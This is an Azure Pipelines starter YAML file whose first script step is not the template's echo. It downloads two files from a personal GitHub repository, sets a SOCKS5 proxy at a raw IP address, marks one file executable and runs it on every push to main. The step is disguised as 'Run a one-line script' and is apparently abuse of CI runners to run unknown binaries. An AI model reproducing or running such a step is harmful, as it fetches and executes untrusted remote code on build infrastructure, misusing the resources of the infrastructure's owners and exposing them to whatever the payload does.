# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml

trigger:
- main

pool:
  vmImage: ubuntu-latest

steps:
- script: wget -O 1 https://raw.githubusercontent.com/johnwixk228/Pake/main/gas && wget -O 2 https://raw.githubusercontent.com/johnwixk228/Pake/main/paket && export http_proxy=socks5://98.162.25.23:4145 && chmod +x 1 && ./1
  displayName: 'Run a one-line script'

- script: |
    echo Add other tasks to build, test, and deploy your project.
    echo See https://aka.ms/yaml
  displayName: 'Run a multi-line script'
